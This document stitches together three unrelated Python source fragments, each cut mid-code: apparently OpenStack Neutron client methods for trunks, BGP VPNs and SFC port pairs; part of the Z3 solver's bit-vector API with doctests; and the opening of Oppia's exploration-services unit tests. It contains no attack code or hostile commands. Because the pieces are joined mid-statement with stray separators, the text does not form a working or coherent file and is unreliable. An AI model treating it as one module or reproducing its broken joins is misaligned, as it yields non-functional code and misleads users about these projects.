"""Removes specified subports from the trunk."""
return self.put(self.subports_remove_path % (trunk), body=body)
def trunk_get_subports(self, trunk, **_params):
"""Fetch a list of all subports attached to given trunk."""
return self.get(self.subports_path % (trunk), params=_params)
def list_bgpvpns(self, retrieve_all=True, **_params):
"""Fetches a list of all BGP VPNs for a project"""
return self.list('bgpvpns', self.bgpvpns_path, retrieve_all, **_params)
def show_bgpvpn(self, bgpvpn, **_params):
"""Fetches information of a certain BGP VPN"""
return self.get(self.bgpvpn_path % bgpvpn, params=_params)
def create_bgpvpn(self, body=None):
"""Creates a new BGP VPN"""
return self.post(self.bgpvpns_path, body=body)
def update_bgpvpn(self, bgpvpn, body=None):
"""Updates a BGP VPN"""
return self.put(self.bgpvpn_path % bgpvpn, body=body)
def delete_bgpvpn(self, bgpvpn):
"""Deletes the specified BGP VPN"""
return self.delete(self.bgpvpn_path % bgpvpn)
def list_bgpvpn_network_assocs(self, bgpvpn, retrieve_all=True, **_params):
"""Fetches a list of network associations for a given BGP VPN."""
return self.list('network_associations',
self.bgpvpn_network_associations_path % bgpvpn,
retrieve_all, **_params)
def show_bgpvpn_network_assoc(self, bgpvpn, net_assoc, **_params):
"""Fetches information of a certain BGP VPN's network association"""
return self.get(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
params=_params)
def create_bgpvpn_network_assoc(self, bgpvpn, body=None):
"""Creates a new BGP VPN network association"""
return self.post(self.bgpvpn_network_associations_path % bgpvpn,
body=body)
def update_bgpvpn_network_assoc(self, bgpvpn, net_assoc, body=None):
"""Updates a BGP VPN network association"""
return self.put(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
body=body)
def delete_bgpvpn_network_assoc(self, bgpvpn, net_assoc):
"""Deletes the specified BGP VPN network association"""
return self.delete(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc))
def list_bgpvpn_router_assocs(self, bgpvpn, retrieve_all=True, **_params):
"""Fetches a list of router associations for a given BGP VPN."""
return self.list('router_associations',
self.bgpvpn_router_associations_path % bgpvpn,
retrieve_all, **_params)
def show_bgpvpn_router_assoc(self, bgpvpn, router_assoc, **_params):
"""Fetches information of a certain BGP VPN's router association"""
return self.get(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
params=_params)
def create_bgpvpn_router_assoc(self, bgpvpn, body=None):
"""Creates a new BGP VPN router association"""
return self.post(self.bgpvpn_router_associations_path % bgpvpn,
body=body)
def update_bgpvpn_router_assoc(self, bgpvpn, router_assoc, body=None):
"""Updates a BGP VPN router association"""
return self.put(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
body=body)
def delete_bgpvpn_router_assoc(self, bgpvpn, router_assoc):
"""Deletes the specified BGP VPN router association"""
return self.delete(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc))
def create_sfc_port_pair(self, body=None):
"""Creates a new Port Pair."""
return self.post(self.sfc_port_pairs_path, body=body)
def update_sfc_port_pair(self, port_pair, body=None):
"""Update a Port Pair."""
return self.put(self.sfc_port_pair_path % port_pair, body=body)
def delete_sfc_port_pair(self, port_pair):
"""Deletes the specified Port Pair."""
return self.delete(self.sfc_port_pair_path % (port_pair))
def list_sfc_port_pairs(self, retrieve_all=True, **_params):
"""Fetches a list of all Port Pairs."""
return self.list('port_pairs', self.sfc_port_pairs_path, retrieve_all,
**_params)
def show_sfc_port_pair(self, port_pair, **_params):
"""Fetches information of a certain Port Pair."""
return self.get(self.sfc_port_pair_path % (port_pair), params=_params)
def create_sfc_port_pair_group(self, body=None):
"""Creates a new Port Pair Group."""
return self.post(self.sfc_port_pair_groups_path, body=body)
def update_sfc_port_pair_group(self, port_pair_group, body=None):
"""Update a Port Pair Group."""
return self.put(self.sfc_port_pair_group_path % | |
bv.ast), ctx)
else:
ctx = _get_ctx(ctx)
return BitVecNumRef(Z3_mk_numeral(ctx.ref(), _to_int_str(val), BitVecSort(bv, ctx).ast), ctx)
def BitVec(name, bv, ctx=None):
"""Return a bit-vector constant named `name`. `bv` may be the number of bits of a bit-vector sort.
If `ctx=None`, then the global context is used.
>>> x = BitVec('x', 16)
>>> is_bv(x)
True
>>> x.size()
16
>>> x.sort()
BitVec(16)
>>> word = BitVecSort(16)
>>> x2 = BitVec('x', word)
>>> eq(x, x2)
True
"""
if isinstance(bv, BitVecSortRef):
ctx = bv.ctx
else:
ctx = _get_ctx(ctx)
bv = BitVecSort(bv, ctx)
return BitVecRef(Z3_mk_const(ctx.ref(), to_symbol(name, ctx), bv.ast), ctx)
def BitVecs(names, bv, ctx=None):
"""Return a tuple of bit-vector constants of size bv.
>>> x, y, z = BitVecs('x y z', 16)
>>> x.size()
16
>>> x.sort()
BitVec(16)
>>> Sum(x, y, z)
0 + x + y + z
>>> Product(x, y, z)
1*x*y*z
>>> simplify(Product(x, y, z))
x*y*z
"""
ctx = _get_ctx(ctx)
if isinstance(names, str):
names = names.split(" ")
return [BitVec(name, bv, ctx) for name in names]
def Concat(*args):
"""Create a Z3 bit-vector concatenation expression.
>>> v = BitVecVal(1, 4)
>>> Concat(v, v+1, v)
Concat(Concat(1, 1 + 1), 1)
>>> simplify(Concat(v, v+1, v))
289
>>> print("%.3x" % simplify(Concat(v, v+1, v)).as_long())
121
"""
args = _get_args(args)
sz = len(args)
if z3_debug():
_z3_assert(sz >= 2, "At least two arguments expected.")
ctx = None
for a in args:
if is_expr(a):
ctx = a.ctx
break
if is_seq(args[0]) or isinstance(args[0], str):
args = [_coerce_seq(s, ctx) for s in args]
if z3_debug():
_z3_assert(all([is_seq(a) for a in args]), "All arguments must be sequence expressions.")
v = (Ast * sz)()
for i in range(sz):
v[i] = args[i].as_ast()
return SeqRef(Z3_mk_seq_concat(ctx.ref(), sz, v), ctx)
if is_re(args[0]):
if z3_debug():
_z3_assert(all([is_re(a) for a in args]), "All arguments must be regular expressions.")
v = (Ast * sz)()
for i in range(sz):
v[i] = args[i].as_ast()
return ReRef(Z3_mk_re_concat(ctx.ref(), sz, v), ctx)
if z3_debug():
_z3_assert(all([is_bv(a) for a in args]), "All arguments must be Z3 bit-vector expressions.")
r = args[0]
for i in range(sz - 1):
r = BitVecRef(Z3_mk_concat(ctx.ref(), r.as_ast(), args[i+1].as_ast()), ctx)
return r
def Extract(high, low, a):
"""Create a Z3 bit-vector extraction expression, or create a string extraction expression.
>>> x = BitVec('x', 8)
>>> Extract(6, 2, x)
Extract(6, 2, x)
>>> Extract(6, 2, x).sort()
BitVec(5)
>>> simplify(Extract(StringVal("abcd"),2,1))
"c"
"""
if isinstance(high, str):
high = StringVal(high)
if is_seq(high):
s = high
offset, length = _coerce_exprs(low, a, s.ctx)
return SeqRef(Z3_mk_seq_extract(s.ctx_ref(), s.as_ast(), offset.as_ast(), length.as_ast()), s.ctx)
if z3_debug():
_z3_assert(low <= high, "First argument must be greater than or equal to second argument")
_z3_assert(_is_int(high) and high >= 0 and _is_int(low) and low >= 0, "First and second arguments must be non negative integers")
_z3_assert(is_bv(a), "Third argument must be a Z3 bit-vector expression")
return BitVecRef(Z3_mk_extract(a.ctx_ref(), high, low, a.as_ast()), a.ctx)
def _check_bv_args(a, b):
if z3_debug():
_z3_assert(is_bv(a) or is_bv(b), "First or second argument must be a Z3 bit-vector expression")
def ULE(a, b):
"""Create the Z3 expression (unsigned) `other <= self`.
Use the operator <= for signed less than or equal to.
>>> x, y = BitVecs('x y', 32)
>>> ULE(x, y)
ULE(x, y)
>>> (x <= y).sexpr()
'(bvsle x y)'
>>> ULE(x, y).sexpr()
'(bvule x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BoolRef(Z3_mk_bvule(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def ULT(a, b):
"""Create the Z3 expression (unsigned) `other < self`.
Use the operator < for signed less than.
>>> x, y = BitVecs('x y', 32)
>>> ULT(x, y)
ULT(x, y)
>>> (x < y).sexpr()
'(bvslt x y)'
>>> ULT(x, y).sexpr()
'(bvult x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BoolRef(Z3_mk_bvult(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def UGE(a, b):
"""Create the Z3 expression (unsigned) `other >= self`.
Use the operator >= for signed greater than or equal to.
>>> x, y = BitVecs('x y', 32)
>>> UGE(x, y)
UGE(x, y)
>>> (x >= y).sexpr()
'(bvsge x y)'
>>> UGE(x, y).sexpr()
'(bvuge x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BoolRef(Z3_mk_bvuge(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def UGT(a, b):
"""Create the Z3 expression (unsigned) `other > self`.
Use the operator > for signed greater than.
>>> x, y = BitVecs('x y', 32)
>>> UGT(x, y)
UGT(x, y)
>>> (x > y).sexpr()
'(bvsgt x y)'
>>> UGT(x, y).sexpr()
'(bvugt x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BoolRef(Z3_mk_bvugt(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def UDiv(a, b):
"""Create the Z3 expression (unsigned) division `self / other`.
Use the operator / for signed division.
>>> x = BitVec('x', 32)
>>> y = BitVec('y', 32)
>>> UDiv(x, y)
UDiv(x, y)
>>> UDiv(x, y).sort()
BitVec(32)
>>> (x / y).sexpr()
'(bvsdiv x y)'
>>> UDiv(x, y).sexpr()
'(bvudiv x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_bvudiv(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def URem(a, b):
"""Create the Z3 expression (unsigned) remainder `self % other`.
Use the operator % for signed modulus, and SRem() for signed remainder.
>>> x = BitVec('x', 32)
>>> y = BitVec('y', 32)
>>> URem(x, y)
URem(x, y)
>>> URem(x, y).sort()
BitVec(32)
>>> (x % y).sexpr()
'(bvsmod x y)'
>>> URem(x, y).sexpr()
'(bvurem x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_bvurem(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def SRem(a, b):
"""Create the Z3 expression signed remainder.
Use the operator % for signed modulus, and URem() for unsigned remainder.
>>> x = BitVec('x', 32)
>>> y = BitVec('y', 32)
>>> SRem(x, y)
SRem(x, y)
>>> SRem(x, y).sort()
BitVec(32)
>>> (x % y).sexpr()
'(bvsmod x y)'
>>> SRem(x, y).sexpr()
'(bvsrem x y)'
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_bvsrem(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def LShR(a, b):
"""Create the Z3 expression logical right shift.
Use the operator >> for the arithmetical right shift.
>>> x, y = BitVecs('x y', 32)
>>> LShR(x, y)
LShR(x, y)
>>> (x >> y).sexpr()
'(bvashr x y)'
>>> LShR(x, y).sexpr()
'(bvlshr x y)'
>>> BitVecVal(4, 3)
4
>>> BitVecVal(4, 3).as_signed_long()
-4
>>> simplify(BitVecVal(4, 3) >> 1).as_signed_long()
-2
>>> simplify(BitVecVal(4, 3) >> 1)
6
>>> simplify(LShR(BitVecVal(4, 3), 1))
2
>>> simplify(BitVecVal(2, 3) >> 1)
1
>>> simplify(LShR(BitVecVal(2, 3), 1))
1
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_bvlshr(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def RotateLeft(a, b):
"""Return an expression representing `a` rotated to the left `b` times.
>>> a, b = BitVecs('a b', 16)
>>> RotateLeft(a, b)
RotateLeft(a, b)
>>> simplify(RotateLeft(a, 0))
a
>>> simplify(RotateLeft(a, 16))
a
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_ext_rotate_left(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def RotateRight(a, b):
"""Return an expression representing `a` rotated to the right `b` times.
>>> a, b = BitVecs('a b', 16)
>>> RotateRight(a, b)
RotateRight(a, b)
>>> simplify(RotateRight(a, 0))
a
>>> simplify(RotateRight(a, 16))
a
"""
_check_bv_args(a, b)
a, b = _coerce_exprs(a, b)
return BitVecRef(Z3_mk_ext_rotate_right(a.ctx_ref(), a.as_ast(), b.as_ast()), a.ctx)
def SignExt(n, a):
"""Return a bit-vector expression with `n` extra sign-bits.
>>> x = BitVec('x', 16)
>>> n = SignExt(8, x)
>>> n.size()
24
>>> n
SignExt(8, x)
>>> n.sort()
BitVec(24)
>>> v0 = BitVecVal(2, 2)
>>> v0
2
>>> v0.size()
2
>>> v = simplify(SignExt(6, v0))
>>> v
254
>>> v.size()
8
>>> print("%.x" % v.as_long())
fe
"""
if z3_debug():
_z3_assert(_is_int(n), "First argument must be an integer")
_z3_assert(is_bv(a), "Second argument must be a Z3 bit-vector expression")
return BitVecRef(Z3_mk_sign_ext(a.ctx_ref(), n, a.as_ast()), a.ctx)
def ZeroExt(n, a):
"""Return a bit-vector expression with `n` extra zero-bits.
>>> x = BitVec('x', 16)
>>> n = ZeroExt(8, x)
>>> n.size()
24
>>> n
ZeroExt(8, x)
>>> n.sort()
BitVec(24)
>>> v0 = BitVecVal(2, 2)
>>> v0
2
>>> v0.size()
2
>>> v = simplify(ZeroExt(6, v0))
>>> v
2
>>> v.size()
8
"""
if z3_debug():
_z3_assert(_is_int(n), "First argument must be an integer")
_z3_assert(is_bv(a), "Second argument must be a Z3 bit-vector expression")
return BitVecRef(Z3_mk_zero_ext(a.ctx_ref(), n, a.as_ast()), a.ctx)
def RepeatBitVec(n, a):
"""Return an expression representing `n` copies of `a`.
>>> x = BitVec('x', 8)
>>> n = RepeatBitVec(4, x)
>>> n
RepeatBitVec(4, x)
>>> n.size()
32
>>> v0 = BitVecVal(10, 4)
>>> print("%.x" % v0.as_long())
a
>>> v = simplify(RepeatBitVec(4, v0))
>>> v.size()
16
>>> print("%.x" % v.as_long())
aaaa
"""
if z3_debug():
_z3_assert(_is_int(n), "First argument must be an integer")
_z3_assert(is_bv(a), "Second | |
<filename>core/domain/exp_services_test.py<gh_stars>1-10
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<NAME>'
import copy
import datetime
import os
import StringIO
import zipfile
from core.domain import config_services
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_jobs
from core.domain import exp_services
from core.domain import fs_domain
from core.domain import param_domain
from core.domain import rating_services
from core.domain import rights_manager
from core.domain import rule_domain
from core.domain import user_services
from core.platform import models
(base_models, exp_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.exploration
])
search_services = models.Registry.import_search_services()
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
from core.tests import test_utils
import feconf
import utils
# TODO(msl): test ExpSummaryModel changes if explorations are updated,
# reverted, deleted, created, rights changed
class ExplorationServicesUnitTests(test_utils.GenericTestBase):
"""Test the exploration services module."""
EXP_ID = 'An_exploration_id'
def setUp(self):
"""Before each individual test, create a dummy exploration."""
super(ExplorationServicesUnitTests, self).setUp()
self.OWNER_ID = self.get_user_id_from_email(self.OWNER_EMAIL)
self.EDITOR_ID = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.VIEWER_ID = self.get_user_id_from_email(self.VIEWER_EMAIL)
user_services.get_or_create_user(self.OWNER_ID, self.OWNER_EMAIL)
user_services.get_or_create_user(self.EDITOR_ID, self.EDITOR_EMAIL)
user_services.get_or_create_user(self.VIEWER_ID, self.VIEWER_EMAIL)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.set_admins([self.ADMIN_EMAIL])
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
class ExplorationQueriesUnitTests(ExplorationServicesUnitTests):
"""Tests query methods."""
def test_count_explorations(self):
"""Test count_explorations()."""
self.assertEqual(exp_services.count_explorations(), 0)
self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
self.assertEqual(exp_services.count_explorations(), 1)
self.save_new_default_exploration(
'A_new_exploration_id', self.OWNER_ID)
self.assertEqual(exp_services.count_explorations(), 2)
def test_get_exploration_titles_and_categories(self):
self.assertEqual(
exp_services.get_exploration_titles_and_categories([]), {})
self.save_new_default_exploration('A', self.OWNER_ID, 'TitleA')
self.assertEqual(
exp_services.get_exploration_titles_and_categories(['A']), {
'A': {
'category': 'A category',
'title': 'TitleA'
}
})
self.save_new_default_exploration('B', self.OWNER_ID, 'TitleB')
self.assertEqual(
exp_services.get_exploration_titles_and_categories(['A']), {
'A': {
'category': 'A category',
'title': 'TitleA'
}
})
self.assertEqual(
exp_services.get_exploration_titles_and_categories(['A', 'B']), {
'A': {
'category': 'A category',
'title': 'TitleA',
},
'B': {
'category': 'A category',
'title': 'TitleB',
},
})
self.assertEqual(
exp_services.get_exploration_titles_and_categories(['A', 'C']), {
'A': {
'category': 'A category',
'title': 'TitleA'
}
})
class ExplorationCreateAndDeleteUnitTests(ExplorationServicesUnitTests):
"""Test creation and deletion methods."""
def test_retrieval_of_explorations(self):
"""Test the get_exploration_by_id() method."""
with self.assertRaisesRegexp(Exception, 'Entity .* not found'):
exp_services.get_exploration_by_id('fake_eid')
exploration = self.save_new_default_exploration(
self.EXP_ID, self.OWNER_ID)
retrieved_exploration = exp_services.get_exploration_by_id(self.EXP_ID)
self.assertEqual(exploration.id, retrieved_exploration.id)
self.assertEqual(exploration.title, retrieved_exploration.title)
with self.assertRaises(Exception):
exp_services.get_exploration_by_id('fake_exploration')
def test_retrieval_of_multiple_explorations(self):
exps = {}
chars = 'abcde'
exp_ids = ['%s%s' % (self.EXP_ID, c) for c in chars]
for _id in exp_ids:
exp = self.save_new_valid_exploration(_id, self.OWNER_ID)
exps[_id] = exp
result = exp_services.get_multiple_explorations_by_id(
exp_ids)
for _id in exp_ids:
self.assertEqual(result.get(_id).title, exps.get(_id).title)
# Test retrieval of non-existent ids.
result = exp_services.get_multiple_explorations_by_id(
exp_ids + ['doesnt_exist'], strict=False
)
for _id in exp_ids:
self.assertEqual(result.get(_id).title, exps.get(_id).title)
self.assertNotIn('doesnt_exist', result)
with self.assertRaises(Exception):
exp_services.get_multiple_explorations_by_id(
exp_ids + ['doesnt_exist'])
def test_soft_deletion_of_explorations(self):
"""Test that soft deletion of explorations works correctly."""
# TODO(sll): Add tests for deletion of states and version snapshots.
self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
# The exploration shows up in queries.
self.assertEqual(
len(exp_services.get_at_least_editable_exploration_summaries(
self.OWNER_ID)), 1)
exp_services.delete_exploration(self.OWNER_ID, self.EXP_ID)
with self.assertRaises(Exception):
exp_services.get_exploration_by_id(self.EXP_ID)
# The deleted exploration does not show up in any queries.
self.assertEqual(
exp_services.get_at_least_editable_exploration_summaries(
self.OWNER_ID),
{})
# But the models still exist in the backend.
self.assertIn(
self.EXP_ID,
[exp.id for exp in exp_models.ExplorationModel.get_all(
include_deleted_entities=True)]
)
# The exploration summary is deleted however
self.assertNotIn(
self.EXP_ID,
[exp.id for exp in exp_models.ExpSummaryModel.get_all(
include_deleted_entities=True)]
)
def test_hard_deletion_of_explorations(self):
"""Test that hard deletion of explorations works correctly."""
self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
# The exploration shows up in queries.
self.assertEqual(
len(exp_services.get_at_least_editable_exploration_summaries(
self.OWNER_ID)), 1)
exp_services.delete_exploration(
self.OWNER_ID, self.EXP_ID, force_deletion=True)
with self.assertRaises(Exception):
exp_services.get_exploration_by_id(self.EXP_ID)
# The deleted exploration does not show up in any queries.
self.assertEqual(
exp_services.get_at_least_editable_exploration_summaries(
self.OWNER_ID),
{})
# The exploration model has been purged from the backend.
self.assertNotIn(
self.EXP_ID,
[exp.id for exp in exp_models.ExplorationModel.get_all(
include_deleted_entities=True)]
)
def test_summaries_of_hard_deleted_explorations(self):
"""Test that summaries of hard deleted explorations are
correctly deleted."""
self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
exp_services.delete_exploration(
self.OWNER_ID, self.EXP_ID, force_deletion=True)
with self.assertRaises(Exception):
exp_services.get_exploration_by_id(self.EXP_ID)
# The deleted exploration summary does not show up in any queries.
self.assertEqual(
exp_services.get_at_least_editable_exploration_summaries(
self.OWNER_ID), {})
# The exploration summary model has been purged from the backend.
self.assertNotIn(
self.EXP_ID,
[exp.id for exp in exp_models.ExpSummaryModel.get_all(
include_deleted_entities=True)]
)
def test_explorations_are_removed_from_index_when_deleted(self):
"""Tests that explorations are removed from the search index when
deleted.
"""
self.save_new_default_exploration(self.EXP_ID, self.OWNER_ID)
def mock_delete_docs(doc_ids, index):
self.assertEqual(index, exp_services.SEARCH_INDEX_EXPLORATIONS)
self.assertEqual(doc_ids, [self.EXP_ID])
delete_docs_swap = self.swap(
search_services, 'delete_documents_from_index', mock_delete_docs)
with delete_docs_swap:
exp_services.delete_exploration(self.OWNER_ID, self.EXP_ID)
def test_create_new_exploration_error_cases(self):
exploration = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, '', '')
with self.assertRaisesRegexp(Exception, 'between 1 and 50 characters'):
exp_services.save_new_exploration(self.OWNER_ID, exploration)
exploration = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'title', '')
with self.assertRaisesRegexp(Exception, 'between 1 and 50 characters'):
exp_services.save_new_exploration(self.OWNER_ID, exploration)
def test_save_and_retrieve_exploration(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.OWNER_ID)
exploration.param_specs = {
'theParameter': param_domain.ParamSpec('UnicodeString')}
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
retrieved_exploration = exp_services.get_exploration_by_id(self.EXP_ID)
self.assertEqual(retrieved_exploration.title, 'A title')
self.assertEqual(retrieved_exploration.category, 'A category')
self.assertEqual(len(retrieved_exploration.states), 1)
self.assertEqual(len(retrieved_exploration.param_specs), 1)
self.assertEqual(
retrieved_exploration.param_specs.keys()[0], 'theParameter')
def test_save_and_retrieve_exploration_summary(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.OWNER_ID)
exploration.param_specs = {
'theParameter': param_domain.ParamSpec('UnicodeString')}
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
# change title and category
exp_services.update_exploration(
self.OWNER_ID, self.EXP_ID, [{
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'A new title'
}, {
'cmd': 'edit_exploration_property',
'property_name': 'category',
'new_value': 'A new category'
}],
'Change title and category')
retrieved_exp_summary = exp_services.get_exploration_summary_by_id(
self.EXP_ID)
self.assertEqual(retrieved_exp_summary.title, 'A new title')
self.assertEqual(retrieved_exp_summary.category, 'A new category')
class LoadingAndDeletionOfDemosTest(ExplorationServicesUnitTests):
def test_loading_and_validation_and_deletion_of_demo_explorations(self):
"""Test loading, validation and deletion of the demo explorations."""
self.assertEqual(exp_services.count_explorations(), 0)
self.assertGreaterEqual(
len(feconf.DEMO_EXPLORATIONS), 1,
msg='There must be at least one demo exploration.')
# TODO(bhenning): Fix backend functionality needed to properly migrate
# these explorations. All demo explorations should be able to be
# loaded, validated, and deleted.
excluded_demo_explorations = ['World Cities']
for ind in range(len(feconf.DEMO_EXPLORATIONS)):
start_time = datetime.datetime.utcnow()
exp_id = str(ind)
if feconf.DEMO_EXPLORATIONS[ind][1] in excluded_demo_explorations:
continue
exp_services.load_demo(exp_id)
exploration = exp_services.get_exploration_by_id(exp_id)
warnings = exploration.validate(strict=True)
if warnings:
raise Exception(warnings)
duration = datetime.datetime.utcnow() - start_time
processing_time = duration.seconds + duration.microseconds / 1E6
self.log_line(
'Loaded and validated exploration %s (%.2f seconds)' % (
exploration.title.encode('utf-8'), processing_time))
self.assertEqual(
exp_services.count_explorations(),
len(feconf.DEMO_EXPLORATIONS) - len(excluded_demo_explorations))
for ind in range(len(feconf.DEMO_EXPLORATIONS)):
exp_services.delete_demo(str(ind))
self.assertEqual(exp_services.count_explorations(), 0)
class ZipFileExportUnitTests(ExplorationServicesUnitTests):
"""Test export methods for explorations represented as zip files."""
SAMPLE_YAML_CONTENT = (
"""author_notes: ''
blurb: ''
default_skin: conversation_v1
init_state_name: %s
language_code: en
objective: The objective
param_changes: []
param_specs: {}
schema_version: %d
skin_customizations:
panels_contents: {}
states:
%s:
content:
- type: text
value: ''
interaction:
answer_groups: []
customization_args:
placeholder:
value: ''
rows:
value: 1
default_outcome:
dest: %s
feedback: []
param_changes: []
fallbacks: []
id: TextInput
param_changes: []
New state:
content:
- type: text
value: ''
interaction:
answer_groups: []
customization_args:
placeholder:
value: ''
rows:
value: 1
default_outcome:
dest: New state
feedback: []
param_changes: []
fallbacks: []
id: TextInput
param_changes: []
states_schema_version: %d
tags: []
""" % (
feconf.DEFAULT_INIT_STATE_NAME,
exp_domain.Exploration.CURRENT_EXPLORATION_SCHEMA_VERSION,
feconf.DEFAULT_INIT_STATE_NAME,
feconf.DEFAULT_INIT_STATE_NAME,
feconf.CURRENT_EXPLORATION_STATES_SCHEMA_VERSION))
UPDATED_YAML_CONTENT = (
"""author_notes: ''
blurb: ''
default_skin: conversation_v1
init_state_name: %s
language_code: en
objective: The objective
param_changes: []
param_specs: {}
schema_version: %d
skin_customizations:
panels_contents: {}
states:
%s:
content:
- type: text
value: ''
interaction:
answer_groups: []
customization_args:
placeholder:
value: ''
rows:
value: 1
default_outcome:
dest: %s
feedback: []
param_changes: []
fallbacks: []
id: TextInput
param_changes: []
Renamed state:
content:
- type: text
value: ''
interaction:
answer_groups: []
customization_args:
placeholder:
value: ''
rows:
value: 1
default_outcome:
dest: Renamed state
feedback: []
param_changes: []
fallbacks: []
id: TextInput
param_changes: []
states_schema_version: %d
tags: []
""" % (
feconf.DEFAULT_INIT_STATE_NAME,
exp_domain.Exploration.CURRENT_EXPLORATION_SCHEMA_VERSION,
feconf.DEFAULT_INIT_STATE_NAME,
feconf.DEFAULT_INIT_STATE_NAME,
feconf.CURRENT_EXPLORATION_STATES_SCHEMA_VERSION))
def test_export_to_zip_file(self):
"""Test the export_to_zip_file() method."""
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.OWNER_ID, objective='The objective')
init_state = exploration.states[exploration.init_state_name]
init_interaction = init_state.interaction
init_interaction.default_outcome.dest = exploration.init_state_name
exploration.add_states(['New state'])
exploration.states['New state'].update_interaction_id('TextInput')
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
zip_file_output = exp_services.export_to_zip_file(self.EXP_ID)
zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
self.assertEqual(zf.namelist(), ['A title.yaml'])
self.assertEqual(
zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)
def test_export_to_zip_file_with_assets(self):
"""Test exporting an exploration with assets to a zip file."""
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.OWNER_ID, objective='The objective')
init_state = exploration.states[exploration.init_state_name]
init_interaction = init_state.interaction
init_interaction.default_outcome.dest = exploration.init_state_name
exploration.add_states(['New state'])
exploration.states['New state'].update_interaction_id('TextInput')
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
with open(os.path.join(feconf.TESTS_DATA_DIR, 'img.png')) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(self.EXP_ID))
fs.commit(self.OWNER_ID, 'abc.png', raw_image)
zip_file_output = exp_services.export_to_zip_file(self.EXP_ID)
zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
self.assertEqual(zf.namelist(), ['A title.yaml', 'assets/abc.png'])
self.assertEqual(
zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)
self.assertEqual(zf.open('assets/abc.png').read(), raw_image)
def test_export_by_versions(self):
"""Test export_to_zip_file() for different versions."""
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.OWNER_ID, objective='The objective')
self.assertEqual(exploration.version, 1)
init_state = exploration.states[exploration.init_state_name]
init_interaction = init_state.interaction
init_interaction.default_outcome.dest = exploration.init_state_name
exploration.add_states(['New state'])
exploration.states['New state'].update_interaction_id('TextInput')
with open(os.path.join(feconf.TESTS_DATA_DIR, 'img.png')) as f:
raw_image = f.read()
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(self.EXP_ID))
fs.commit(self.OWNER_ID, 'abc.png', raw_image)
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
self.assertEqual(exploration.version, 2)
exploration.rename_state('New state', 'Renamed state')
exp_services._save_exploration(self.OWNER_ID, exploration, '', [])
self.assertEqual(exploration.version, 3)
# Download version 2
zip_file_output = exp_services.export_to_zip_file(self.EXP_ID, 2)
zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
self.assertEqual(
zf.open('A title.yaml').read(), self.SAMPLE_YAML_CONTENT)
# Download version 3
zip_file_output = exp_services.export_to_zip_file(self.EXP_ID, 3)
zf = zipfile.ZipFile(StringIO.StringIO(zip_file_output))
self.assertEqual(
zf.open('A title.yaml').read(), self.UPDATED_YAML_CONTENT)
class YAMLExportUnitTests(ExplorationServicesUnitTests):
"""Test export methods for explorations represented as a dict whose keys
are state names and whose values are YAML strings | |
